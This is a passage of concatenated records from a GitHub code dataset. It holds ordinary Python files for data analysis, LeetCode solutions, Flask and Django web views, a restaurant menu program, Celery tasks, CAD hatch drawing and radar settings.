key))\n return merged\n\n def _fast_merge(self, hist_dict, new_hists, weight):\n \"\"\"\n circumvents lots of error checking and array copying used in the\n normal merge.\n\n Basic benchmarking:\n - fast merge: 8.025s\n - normal merge: 21.071s\n - speedup of 2.6\n \"\"\"\n keys = hist_dict.keys()\n for key in keys:\n subgroup = hist_dict[key]\n if not key in new_hists:\n raise HistAddError(\n \"node {} not found in new hists\".format(key))\n if isinstance(subgroup, dict):\n self._fast_merge(hist_dict[key], new_hists[key], weight)\n elif isinstance(subgroup, HistNd):\n if not 
isinstance(new_hists[key], Dataset):\n raise HistAddError(\n \"tried to merge non-dataset {}\".format(key))\n # proper treating of weighted hists\n if weight is None:\n new_arr = np.array(new_hists[key])\n elif self.wt2_ext and key.endswith(self.wt2_ext):\n new_arr = np.array(new_hists[key]) * weight**2\n else:\n new_arr = np.array(new_hists[key])*weight\n\n hist_dict[key] += new_arr\n else:\n raise HistAddError('not sure what to do with {}, {}'.format(\n type(subgroup), key))\n\n def _write(self, hists, group):\n for key, hist in hists.items():\n if isinstance(hist, dict):\n subgrp = group.create_group(key)\n self._write(hist, subgrp)\n else:\n hist.write_to(group, key)\n\n def add(self, group, weight=1.0):\n self.hists = self._merge(self.hists, group, weight)\n def fast_add(self, group, weight=None):\n self._fast_merge(self.hists, group, weight)\n\n def write_to(self, group):\n self._write(self.hists, group)\n\n def dump(self, group=None, base=''):\n if not group:\n group = self.hists\n for key, subgroup in group.items():\n path = '/'.join([base, key])\n if isinstance(subgroup, dict):\n self.dump(subgroup, path)\n else:\n print(path, subgroup.array.sum())\n\nclass HistAddError(Exception):\n def __init__(self, args):\n super(HistAddError, self).__init__(args)\n\n","repo_name":"dguest/susy-analysis","sub_path":"python3/scharm/aggregate/histadd.py","file_name":"histadd.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8601870813","text":"import cv2 as cv\nimport numpy as np\nimport sys\n\nimg = cv.imread(\"data/YaleB/yaleB02/yaleB02_P00A+000E+00.png\",0)\n\nif img is None:\n print(\"Error::Cannot read image\")\n sys.exit()\n\nprint(img)\n\ncv.imshow('image',img)\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"CristobalBL/pyLocalOpImage","sub_path":"read_images.py","file_name":"read_images.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2806594056","text":"\"\"\" Load saved FLAML model and get heuristic feature importances. \n\nFor a model trained with FLAML, will load the underlying saved model\nand get the heuristic feature importances for that class of model. The\noptions are:\n\n\tlightgbm.sklearn.LGBMRegressor or lightgbm.sklearn.LGBMClassifier\n\t\t- 'split': number of times a feature is used to split the data\n\t\t\tacross all trees\n\t\t- 'gain': total gain of splits which use the feature is used\n\n\tTODO: add other models\n\nThe feature importances are saved as a dataframe and plotted with bar\nplot(s).\n\nCommand-line arguments:\n\t-m, --model_path: path to saved FLAML model\n\t-o, --output_dir: directory to save plots to. Default: current directory\n\t-n, --num_features: top n features to plot. 
Default: 50\n\"\"\"\n\nimport argparse\nimport pickle\nimport os\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport lightgbm as lgb\n\n\ndef lightgbm_feat_importances(model):\n\t\"\"\" Get heuristic feature importances for lightgbm model.\n\t\n\tReturns:\n\t\tfeat_df: dataframe of feature importance scores ('Split' and 'Gain')\n\t\t\tfor each feature name.\n\t\"\"\"\n\tlgb_booster = model.estimator.booster_\n\n\tfeat_df = pd.DataFrame({\n\t\t'Feature': lgb_booster.feature_name(),\n\t\t'Split': lgb_booster.feature_importance(importance_type='split'),\n\t\t'Gain': lgb_booster.feature_importance(importance_type='gain')\n\t})\n\n\treturn feat_df\n\n\ndef catboost_feat_importances(model):\n\t\"\"\" Get heuristic feature importances for catboost model.\n\t\n\tReturns:\n\t\tfeat_df: dataframe of feature importance score\n\t\t\t('PredictionValuesChange').\n\t\"\"\"\n\t# model.estimator.get_feature_importance(type='FeatureImportance')\n\n\treturn pd.DataFrame({\n\t\t'Feature': model.estimator.feature_names_,\n\t\t'PredictionValuesChange': model.estimator.get_feature_importance(\n\t\t\ttype='PredictionValuesChange'\n\t\t)\n\t})\n\t\n\nif __name__ == '__main__':\n \n\t# Parse command-line arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\n\t\t'-m', '--model_path', type=str, required=True,\n\t\thelp='Path to saved FLAML model'\n\t)\n\tparser.add_argument(\n\t\t'-o', '--output_dir', type=str, default='.',\n\t\thelp='Directory to save plots to. Default: current directory'\n\t)\n\tparser.add_argument(\n\t\t'-n', '--num_features', type=int, default=50,\n\t\thelp='Top n features to plot. Default: 50'\n\t)\n\targs = parser.parse_args()\n\n\t# Load saved FLAML model\n\twith open(args.model_path, 'rb') as f:\n\t\tmodel = pickle.load(f)\n\n\t# Get heuristic feature importance dataframe and list of feature names\n\tif (\n\t\tmodel.estimator_class is lgb.sklearn.LGBMRegressor\n\t\tor model.estimator_class is lgb.sklearn.LGBMClassifier\n\t):\n\t\tfeat_df = lightgbm_feat_importances(model)\n\t\timp_score_names = ['Split', 'Gain']\n\telif 'CatBoost' in model.estimator_class.__name__:\n\t\tfeat_df = catboost_feat_importances(model)\n\t\timp_score_names = ['PredictionValuesChange']\n\telse:\n\t\traise NotImplementedError(\n\t\t\tf'Feature importances not implemented for model type {model.estimator_class.__name__}'\n\t\t)\n\t\n\t# Add feature type column to dataframe\n\t# Categories:\n\t# \t- 'PC': principal component ('pc' in feature name)\n\t# \t- 'Rare': rare variant ('rare' in feature name)\n\t# \t- 'Common': common variant ('common' in feature name)\n\t# \t- 'Covar': other feature\n\tfeat_df['Type'] = 'Covar'\n\tfeat_df.loc[feat_df['Feature'].str.contains('pc'), 'Type'] = 'PC'\n\tfeat_df.loc[feat_df['Feature'].str.contains('rare'), 'Type'] = 'Rare'\n\tfeat_df.loc[feat_df['Feature'].str.contains('common'), 'Type'] = 'Common'\n\n\t# Save feature importance dataframe\n\tfeat_df.to_csv(\n\t\tos.path.join(args.output_dir, 'heur_feat_importances.csv'),\n\t\tindex=False\n\t)\n\n\t# Plot feature importances for top n features\n\tfor score_name in imp_score_names:\n\t\t# get sorted dataframe of top n features wrt score_name\n\t\ttop_n_feat_df = feat_df.sort_values(\n\t\t\tscore_name, ascending=False\n\t\t).iloc[:args.num_features]\n\n\t\t# plot barplot\n\t\tplt.figure(figsize=(10, 10))\n\t\tsns.barplot(\n\t\t\tx=score_name,\n\t\t\ty='Feature',\n\t\t\thue='Type',\n\t\t\tdata=top_n_feat_df,\n\t\t\tdodge=False,\n\t\t\thue_order=['Covar', 'Common', 'PC', 
'Rare']\n\t\t).set_ylabel('')\n\t\tplt.xlabel(score_name)\n\t\tplt.tight_layout()\n\t\tplt.savefig(\n\t\t\tos.path.join(\n\t\t\t\targs.output_dir, \n\t\t\t\tf'feat_importances_{score_name}_top_{args.num_features}.png'\n\t\t\t)\n\t\t)\n\t\tplt.close()\n","repo_name":"RossDeVito/gwas_models","sub_path":"auto_ml/get_heuristic_feat_importance.py","file_name":"get_heuristic_feat_importance.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3941289747","text":"class Solution:\n    def manhattanDis(self, x1: int, y1: int, x2: int, y2: int):\n        xdif = abs(x1 - x2)\n        ydif = abs(y1 - y2)\n        if xdif == 0 or ydif == 0:\n            return xdif + ydif\n        \n        return -1\n    \n    def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:\n        ans = []\n        for i in range(len(points)):\n            manResult = self.manhattanDis(x, y, points[i][0], points[i][1])\n            ans.append(manResult)\n        answer = float(\"inf\")\n        ansInd = -1\n        for i in range(len(ans)):\n            if ans[i] < answer and ans[i] != -1:\n                ansInd = i\n                answer = ans[i]\n        return ansInd\n","repo_name":"Beki4382/Competitive-Programming","sub_path":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate/1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_name":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4656116899","text":"import filecmp\nimport shutil\nimport unittest\nimport os\nfrom quatradis.comparison.split import split_plot\n\ndata_dir = os.path.join('data', 'comparison', 'split')\n\n\nclass TestSplit(unittest.TestCase):\n\n    def test_split_plot(self):\n        output_dir = os.path.join(data_dir, \"small_case\", \"output\")\n\n        split_plot(os.path.join(data_dir, 'small_case.insert_site_plot.gz'), output_dir, minimum_threshold=5)\n\n        self.assertTrue(os.path.exists(os.path.join(output_dir, \"combined.plot.gz\")))\n        self.assertTrue(filecmp.cmp(os.path.join(output_dir, \"combined.plot.gz\"),\n                                    os.path.join(data_dir, \"small_case\", \"combined.plot.gz\")))\n\n        self.assertTrue(os.path.exists(os.path.join(output_dir, \"forward.plot.gz\")))\n        self.assertTrue(filecmp.cmp(os.path.join(output_dir, \"forward.plot.gz\"),\n                                    os.path.join(data_dir, \"small_case\", \"forward.plot.gz\")))\n\n        self.assertTrue(os.path.exists(os.path.join(output_dir, \"reverse.plot.gz\")))\n        self.assertTrue(filecmp.cmp(os.path.join(output_dir, \"reverse.plot.gz\"),\n                                    os.path.join(data_dir, \"small_case\", \"reverse.plot.gz\")))\n\n        shutil.rmtree(output_dir)\n","repo_name":"quadram-institute-bioscience/QuaTradis","sub_path":"tests/py/comparison/split_test.py","file_name":"split_test.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39527439631","text":"import logging\nfrom flask import Flask, jsonify, request\nfrom ringConnector.core import downloadDaysDingVideos\nimport datetime\n\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.DEBUG)\nlogging.getLogger('requests_oauthlib').setLevel(logging.INFO)\nlogging.getLogger('urllib3').setLevel(logging.INFO)\n\napp = Flask(__name__)\n\n\nlogging.info(\"Server started\")\n\n\n@app.route('/')\ndef hello():\n    return 'Pong'\n\n@app.route('/connector/download/today')\ndef downloadForToday():\n    logging.debug(f\"Downloading today's 
events\")\n eventsList = downloadDaysDingVideos()\n return jsonify(eventsList)\n\n@app.route('/connector/download/', methods=[\"POST\"])\ndef downloadForDay(dayString):\n downloadedEventsRingIds = request.json\n logging.debug(f\"Downloading {dayString}. Will not re-download events {downloadedEventsRingIds}\")\n\n # assert dayString == request.view_args['day']\n \n dayToDownload = datetime.datetime.strptime(dayString, '%Y%m%d').date()\n\n eventsList = downloadDaysDingVideos(dayToDownload = dayToDownload, downloadedEventsRingIds = downloadedEventsRingIds)\n\n logging.debug(f\"downloaded {len(eventsList)} new events for {dayToDownload}\")\n\n return jsonify(eventsList)\n","repo_name":"ring-face/ringface-connector","sub_path":"ringConnector/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28173304711","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import *\nfrom datetime import datetime\n\nfrom django.db.models import Q # Q-objects concept \n\ndef index(request):\n return render(request, 'index.html')\n\ndef all_emp(request):\n emps = Employee.objects.all()\n\n context = {\n 'emps':emps\n }\n return render(request, 'view_all_emp.html', context)\n\ndef add_emp(request):\n if request.method == 'POST':\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n salary = int(request.POST['salary'])\n bonus = int(request.POST['bonus'])\n phone = int(request.POST['phone'])\n role = request.POST['role']\n dept = int(request.POST['dept'])\n\n new_emp = Employee(first_name=first_name, last_name=last_name, salary=salary, bonus=bonus, phone=phone, role_id = role, dept_id = dept, hire_date = datetime.now())\n new_emp.save()\n print(new_emp)\n return redirect('/all_emp')\n elif request.method == 'GET':\n return render(request, 'add_emp.html')\n else:\n return HttpResponse(\"Distraction occured\")\n\ndef remove_emp(request, emp_id = 0):\n if emp_id:\n try:\n emp_to_be_removed = Employee.objects.get(id = emp_id)\n emp_to_be_removed.delete()\n return redirect('/')\n except:\n return HttpResponse(\"Please enter a valid EMP ID\")\n\n emps = Employee.objects.all()\n\n context = {\n 'emps':emps\n }\n return render(request, 'remove_emp.html', context)\n\ndef filter_emp(request):\n if request.method == 'POST':\n name = request.POST['name']\n dept = request.POST['dept']\n role = request.POST['role']\n\n emps = Employee.objects.all()\n # below is formets to be writen.\n if name:\n emps = emps.filter(Q(first_name__icontains = name) | Q(last_name__icontains = name))\n if dept:\n emps = emps.filter(dept__name__icontains = dept)\n if role: # icontains is used to filter either using single letter, it maybe upper-case or lower-case\n emps = emps.filter(role__name = role)\n\n context = {\n 'emps':emps\n }\n\n return render(request, 'view_all_emp.html', context)\n \n elif request.method == 'GET':\n return render(request, 'filter_emp.html')\n else:\n return HttpResponse(\"An exception occured\")\n\n return render(request, 'filter_emp.html', context)\n\n","repo_name":"rohittgajula/EMPLOYEE_MANAGEMENT-Django","sub_path":"emp_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27315052177","text":"class ItemMenu:\n def __init__(self, id, nome, descricao, categoria, preco):\n 
self.id = id\n self.nome = nome\n self.descricao = descricao\n self.categoria = categoria\n self.preco = preco\n\nclass Pedido:\n def __init__(self, id, item, id_mesa, id_cliente, data_hora):\n self.id = id\n self.item = item\n self.id_mesa = id_mesa\n self.id_cliente = id_cliente\n self.data_hora = data_hora\n\nclass Mesa:\n def __init__(self, id, capacidade):\n self.id = id\n self.capacidade = capacidade\n\nclass Cliente:\n def __init__(self, id, nome, telefone, email):\n self.id = id\n self.nome = nome\n self.telefone = telefone\n self.email = email\n\nclass Restaurante:\n def __init__(self):\n self.cardapio = []\n self.pedidos = []\n self.mesas = []\n self.clientes = []\n\n def adicionar_item(self, nome, descricao, categoria, preco):\n item_id = len(self.cardapio) + 1\n item = ItemMenu(item_id, nome, descricao, categoria, preco)\n self.cardapio.append(item)\n return item\n\n def adicionar_pedido(self, item_menu, id_mesa, id_cliente, data_hora):\n pedido_id = len(self.pedidos) + 1\n pedido = Pedido(pedido_id, item_menu, id_mesa, id_cliente, data_hora)\n self.pedidos.append(pedido)\n return pedido\n\n def adicionar_mesa(self, capacidade):\n mesa_id = len(self.mesas) + 1\n mesa = Mesa(mesa_id, capacidade)\n self.mesas.append(mesa)\n return mesa\n\n def adicionar_cliente(self, nome, telefone, email):\n cliente_id = len(self.clientes) + 1\n cliente = Cliente(cliente_id, nome, telefone, email)\n self.clientes.append(cliente)\n return cliente\n\n def obter_item_por_id(self, item_id):\n for item in self.cardapio:\n if item.id == item_id:\n return item\n return None\n\n def obter_mesa_por_id(self, mesa_id):\n for mesa in self.mesas:\n if mesa.id == mesa_id:\n return mesa\n return None\n\n def obter_cliente_por_id(self, cliente_id):\n for cliente in self.clientes:\n if cliente.id == cliente_id:\n return cliente\n return None\n\n def obter_cardapio(self):\n return self.cardapio\n\n def obter_pedidos_por_mesa(self, mesa_id):\n pedidos_mesa = []\n for pedido in self.pedidos:\n if pedido.id_mesa == mesa_id:\n pedidos_mesa.append(pedido)\n return pedidos_mesa\n\n def obter_pedidos_por_cliente(self, cliente_id):\n pedidos_cliente = []\n for pedido in self.pedidos:\n if pedido.id_cliente == cliente_id:\n pedidos_cliente.append(pedido)\n return pedidos_cliente\n\n def obter_mesas_disponiveis(self):\n mesas_disponiveis = []\n for mesa in self.mesas:\n if self.verificar_mesa_disponivel(mesa.id):\n mesas_disponiveis.append(mesa)\n return mesas_disponiveis\n\n def verificar_mesa_disponivel(self, mesa_id):\n for pedido in self.pedidos:\n if pedido.id_mesa == mesa_id:\n return False\n return True\n\n def exibir_menu(self):\n opcao = 0\n while opcao != 5:\n print(\"----- MENU -----\")\n print(\"1. Pedidos por cliente\")\n print(\"2. Cardápio\")\n print(\"3. Mesas disponíveis\")\n print(\"4. Clientes cadastrados\")\n print(\"5. 
Sair\")\n opcao = int(input(\"Selecione uma opção: \"))\n\n if opcao == 1:\n cliente_id = int(input(\"Digite o ID do cliente: \"))\n pedidos_cliente = self.obter_pedidos_por_cliente(cliente_id)\n if pedidos_cliente:\n print(f\"Pedidos do cliente {self.obter_cliente_por_id(cliente_id).nome}:\")\n for pedido in pedidos_cliente:\n item = self.obter_item_por_id(pedido.item.id)\n print(f\"Pedido: {item.nome} - Data/Hora: {pedido.data_hora}\")\n else:\n print(\"Nenhum pedido encontrado para o cliente.\")\n\n elif opcao == 2:\n cardapio = self.obter_cardapio()\n print(\"Cardápio:\")\n for item in cardapio:\n print(f\"Item: {item.nome} - Categoria: {item.categoria} - Preço: R${item.preco}\")\n\n elif opcao == 3:\n mesas_disponiveis = self.obter_mesas_disponiveis()\n if mesas_disponiveis:\n print(\"Mesas disponíveis:\")\n for mesa in mesas_disponiveis:\n print(f\"Mesa disponível: {mesa.id} - Capacidade: {mesa.capacidade}\")\n else:\n print(\"Todas as mesas estão ocupadas.\")\n\n elif opcao == 4:\n clientes = self.clientes\n if clientes:\n print(\"Clientes cadastrados:\")\n for cliente in clientes:\n print(f\"Cliente: {cliente.nome} - Telefone: {cliente.telefone} - Email: {cliente.email}\")\n else:\n print(\"Nenhum cliente cadastrado.\")\n\n elif opcao == 5:\n print(\"Saindo do programa...\")\n break\n\n else:\n print(\"Opção inválida. Digite novamente.\")\n\nrestaurante = Restaurante()\n\n# Adicionar itens ao menu\nitem_salada = restaurante.adicionar_item(\"Salada\", \"Salada com alface, croutons e molho Caesar\", \"Entrada\", 15.0)\nitem_spaghetti = restaurante.adicionar_item(\"Spaghetti à Bolonhesa\", \"Massa de spaghetti com molho à bolonhesa\", \"Prato Principal\", 25.0)\nitem_sorvete = restaurante.adicionar_item(\"Sorvete de Morango\", \"Sorvete de Morango com cobertura\", \"Sobremesa\", 12.0)\nitem_picanha = restaurante.adicionar_item(\"Picanha Argentina\", \"Refeição de Picanha Argentina\", \"Prato Principal\", 80.0)\nitem_frango = restaurante.adicionar_item(\"Frango assado\", \"Refeição de Frango Assado\", \"Prato Principal\", 80.0)\nitem_saladadefruta = restaurante.adicionar_item(\"Salada de frutas\", \"Salada de frutas vermelhas\", \"Sobremesa\", 9.0)\nitem_espetinho = restaurante.adicionar_item(\"espetinho\", \"Espetinho de carne, de frango ou porco\", \"Entrada\", 7.0)\nitem_lasanha = restaurante.adicionar_item(\"Lasanha\", \"Lasanha de carne\", \"Prato Principal\", 28.0)\nitem_frangodeso = restaurante.adicionar_item(\"Frango desossado\", \"Frango desossado\", \"Prato Principal\", 35.0)\nitem_pizza = restaurante.adicionar_item(\"Pizza\", \"Pizza Pequena(pedaço)\", \"Entrada\", 10.0)\nitem_hamburguer = restaurante.adicionar_item(\"Hamburguer\", \"Hamburguer duas carnes, ovo e salada\", \"Entrada\", 15.0)\nitem_pastel = restaurante.adicionar_item(\"Pastel\", \"Pastel de carne, de frango ou queijo\", \"Entrada\", 12.0)\n\n# Adicionar mesas ao restaurante\nmesa_1 = restaurante.adicionar_mesa(4)\nmesa_2 = restaurante.adicionar_mesa(4)\nmesa_3 = restaurante.adicionar_mesa(6)\nmesa_4 = restaurante.adicionar_mesa(4)\nmesa_5 = restaurante.adicionar_mesa(2)\nmesa_6 = restaurante.adicionar_mesa(8)\nmesa_7 = restaurante.adicionar_mesa(6)\nmesa_8 = restaurante.adicionar_mesa(4)\n\n# Adicionar clientes ao restaurante\ncliente_1 = restaurante.adicionar_cliente(\"João Pedro\", \"9925-1111\", \"jjj23@hotmail.com\")\ncliente_2 = restaurante.adicionar_cliente(\"Mariana\", \"9899-2222\", \"mariana@example.com\")\ncliente_3 = restaurante.adicionar_cliente(\"Pedro Avelar\", \"8899-3873\", 
\"peduy12@gmail.com\")\ncliente_4 = restaurante.adicionar_cliente(\"Nunes\", \"8779-0023\", \"pnunes012@hotmail.com\")\ncliente_5 = restaurante.adicionar_cliente(\"Pedro Luiz\", \"8979-3323\", \"pedr@hotmail.com\")\ncliente_6 = restaurante.adicionar_cliente(\"Antonieta\", \"8991-3323\", \"ped872@hotmail.com\")\ncliente_7 = restaurante.adicionar_cliente(\"Maria Luiza\", \"8999-3323\", \"luizah012@hotmail.com\")\ncliente_8 = restaurante.adicionar_cliente(\"Pedro Fontineles\", \"8099-9393\", \"pedrin1298@hotmail.com\")\ncliente_9 = restaurante.adicionar_cliente(\"Lucas Fontineles\", \"8909-3320\", \"lkfontineles29@hotmail.com\")\n\n# Fazer pedidos\nrestaurante.adicionar_pedido(item_salada, mesa_1.id, cliente_1.id, \"2023-06-28 11:00:00\")\nrestaurante.adicionar_pedido(item_espetinho, mesa_1.id, cliente_1.id, \"2023-06-28 11:10:00\")\nrestaurante.adicionar_pedido(item_spaghetti, mesa_2.id, cliente_2.id, \"2023-06-28 11:30:00\")\nrestaurante.adicionar_pedido(item_sorvete, mesa_1.id, cliente_3.id, \"2023-06-28 13:00:00\")\nrestaurante.adicionar_pedido(item_sorvete, mesa_2.id, cliente_2.id, \"2023-06-28 13:30:00\")\nrestaurante.adicionar_pedido(item_picanha, mesa_3.id, cliente_4.id, \"2023-06-28 13:20:00\")\nrestaurante.adicionar_pedido(item_frango, mesa_2.id, cliente_5.id, \"2023-06-28 12:30:00\")\nrestaurante.adicionar_pedido(item_spaghetti, mesa_5.id, cliente_9.id, \"2023-06-28 12:10:50\")\nrestaurante.adicionar_pedido(item_salada, mesa_5.id, cliente_8.id, \"2023-06-28 12:00:00\")\nrestaurante.adicionar_pedido(item_hamburguer, mesa_6.id, cliente_7.id, \"2023-06-28 18:30:00\")\nrestaurante.adicionar_pedido(item_saladadefruta, mesa_6.id, cliente_7.id, \"2023-06-28 18:30:55\")\nrestaurante.adicionar_pedido(item_pizza, mesa_6.id, cliente_7.id, \"2023-06-28 18:31:00\")\n\n# Exibir menu interativo\nrestaurante.exibir_menu()\n","repo_name":"GFONTINELES/projeto_restaurante","sub_path":"de.py","file_name":"de.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19804090630","text":"import os\nimport numpy as np\nimport cv2\nimport scipy.io\n\nfrom blueprint.ml import Dataset, Split\n\n\nclass AFLW_19(Dataset):\n def __init__(self, root, split=Split.ALL, subset: str = 'full'):\n self.images_root = os.path.join(root, 'data', 'flickr')\n info = scipy.io.loadmat(os.path.join(\n root, 'AFLWinfo_release.mat'))\n self.bbox = info['bbox'] # 24386x4 left, right, top bottom\n self.data = info['data'] # 24386x38 x1,x2...,xn,y1,y2...,yn\n self.mask = info['mask_new'] # 24386x19\n self.name_list = [s[0][0] for s in info['nameList']]\n\n ra = np.reshape(info['ra'].astype(np.int32), [-1])-1\n assert ra.min() == 0\n assert ra.max() == self.bbox.shape[0] - 1\n if split == Split.ALL:\n self.indices = ra\n elif split == Split.TRAIN:\n self.indices = ra[:20000]\n elif split == Split.TEST:\n if subset == 'full':\n self.indices = ra[20000:]\n elif subset == 'frontal':\n all_visible = np.all(self.mask == 1, axis=1) # 24386\n self.indices = np.array(\n [ind for ind in ra[20000:] if all_visible[ind]])\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, index):\n ind = self.indices[index]\n image_path = os.path.join(\n self.images_root, self.name_list[ind])\n assert os.path.exists(image_path)\n image = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB)\n landmarks = np.reshape(self.data[ind], [2, 19]).transpose()\n\n left, right, top, bottom = self.bbox[ind]\n box_y1x1y2x2 = np.array([top, left, 
bottom, right], dtype=np.float32)\n\n        visibility = self.mask[ind]\n        return {\n            'image': image,\n            'box': box_y1x1y2x2,\n            'landmarks': landmarks,\n            'visibility': visibility\n        }\n\n    def sample_name(self, index):\n        return str(index)\n","repo_name":"FacePerceiver/FaRL","sub_path":"farl/datasets/aflw.py","file_name":"aflw.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"53"} +{"seq_id":"71476705128","text":"import os\nimport requests\nfrom dotenv import load_dotenv\nfrom django.contrib.auth import get_user_model\nfrom config.celery import app\nfrom .utils import send_email\n\n\nload_dotenv()\n\nUser = get_user_model()\n\n\nBASE_URL = os.environ.get(\"BASE_URL\")\n\n\n@app.task(bind=True, default_retry_delay=5 * 60)\ndef send_email_for_user(self, data):\n    \"\"\"\n    Queues sending an email to the user\n    via Celery.\n\n    On failure, another attempt to send the message\n    is made after 1 minute.\n    \"\"\"\n    try:\n        send_email(\n            data=data\n        )\n    except Exception as exc:\n        raise self.retry(exc=exc, countdown=60)\n\n\n@app.task(bind=True, default_retry_delay=5 * 60)\ndef create_user_wallet(self, access_token):\n    \"\"\"\n    Queues creating a wallet for the user\n    via Celery.\n\n    On failure, another attempt to send the request\n    is made after 1 minute.\n    \"\"\"\n\n    auth_data = {\n        'Authorization': f'Bearer {access_token}'\n    }\n    try:\n        requests.post(\n            url=BASE_URL + '/api/v1/users/create',\n            headers=auth_data\n        )\n    except Exception as exc:\n        raise self.retry(exc=exc, countdown=60)\n","repo_name":"EasyDev-co/CloudMiningWebsite","sub_path":"backend/src/users/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30421195137","text":"N,M = map(int,input().split())\n\nlst = [i for i in range(1,N+1)]\n\nresult = []\n\ndef finding(start):\n    if len(result) == M:\n        for i in result:\n            print(i, end =\" \")\n        print()\n    else:\n        for i in range(len(lst)):\n            if len(result) > 0:\n                if lst[i] >= result[-1]: \n                    result.append(lst[i])\n                    finding(i+1) \n                    result.pop() \n            else:\n                result.append(lst[i])\n                finding(i+1)\n                result.pop()\n\nfinding(0)","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/backtracking/15651.py","file_name":"15651.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25198202472","text":"class Solution:\n    def romanToInt(self, s: str) -> int:\n        hashmap = {\"I\": 1,\"V\": 5, \"X\":10, \"L\":50, \"C\": 100, \"D\": 500, \"M\": 1000, \"IV\": 4, \"IX\": 9, \"XL\":40, \"XC\":90, \"CD\":400, \"CM\":900}\n        skip = 0\n        res = 0\n        for i in range(len(s)):\n            if skip:\n                skip = 0\n                continue\n            if s[i:i+2] in hashmap:\n                skip = 1\n                res += hashmap.get(s[i:i+2])\n                continue\n            res += hashmap.get(s[i])\n        return res\n    \n","repo_name":"Reflectrr/leetcode","sub_path":"13.roman_to_integer.py","file_name":"13.roman_to_integer.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70791067688","text":"import ezdxf\nfrom ezdxf.lldxf import const\n\n# Trying to have a hatch with a hole.\n\nname = 'test_hatch_hole.dxf'\n\ndwg = ezdxf.new('AC1015') # hatch requires the DXF R2000 (AC1015) format or later\nmsp = dwg.modelspace() # adding entities to the model space\n\ndwg.layers.new('HATCH', 
dxfattribs={'linetype': 'Continuous', 'color': 8})\n\nhatch = msp.add_hatch(color=1, dxfattribs={'layer': 'HATCH'})\n\nwith hatch.edit_boundary() as boundary:\n    # every boundary path is always a 2D element\n    boundary.add_polyline_path([(0, 0), (10, 0), (10, 10), (0, 10)], is_closed=1, flags=const.BOUNDARY_PATH_EXTERNAL)\n    boundary.add_polyline_path([(3, 3), (7, 3), (7, 7), (3, 7)], is_closed=1, flags=const.BOUNDARY_PATH_OUTERMOST) # hole\n\ndwg.saveas(name)\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"issues/20170329 HatchHole/HatchHole.py","file_name":"HatchHole.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20519278280","text":"#\n# This file is part of Vizy \n#\n# All Vizy source code is provided under the terms of the\n# GNU General Public License v2 (http://www.gnu.org/licenses/gpl-2.0.html).\n# Those wishing to use Vizy source code, software and/or\n# technologies under different licensing terms should contact us at\n# support@charmedlabs.com. \n#\n\n# Name of Google Photos album to store photos\nALBUM = \"radar\"\n# Minimum value before differences in pixel values are considered motion\nNOISE_FLOOR = 30*3\n# Maximum amount of time a vehicle can take to traverse the width of the image\nDATA_TIMEOUT = 10 # seconds\n# Number of seconds the speed is displayed on the video window after a vehicle's speed is measured\nSPEED_DISPLAY_TIMEOUT = 3 # seconds\n# Font size to overlay the speed on top of the video/image\nFONT_SIZE = 60 \n# Color to overlay speed\nFONT_COLOR = (0, 255, 0)\n# Color to overlay speed if speed limit is exceeded\nFONT_COLOR_EXCEED = (0, 0, 255)\n# Minimum number of data points for a valid vehicle detection\nMINIMUM_DATA = 3\n# Camera shutter speed (seconds)\nSHUTTER_SPEED = 0.001\n# Camera shutter speed in low light conditions (seconds)\nLOW_LIGHT_SHUTTER_SPEED = 1/30\n# Maximum least-squares fitting error per data point for a valid vehicle detection\nMAX_RESIDUAL = 100\n","repo_name":"charmedlabs/vizy","sub_path":"apps/radar/radar_consts.py","file_name":"radar_consts.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"28898248947","text":"# 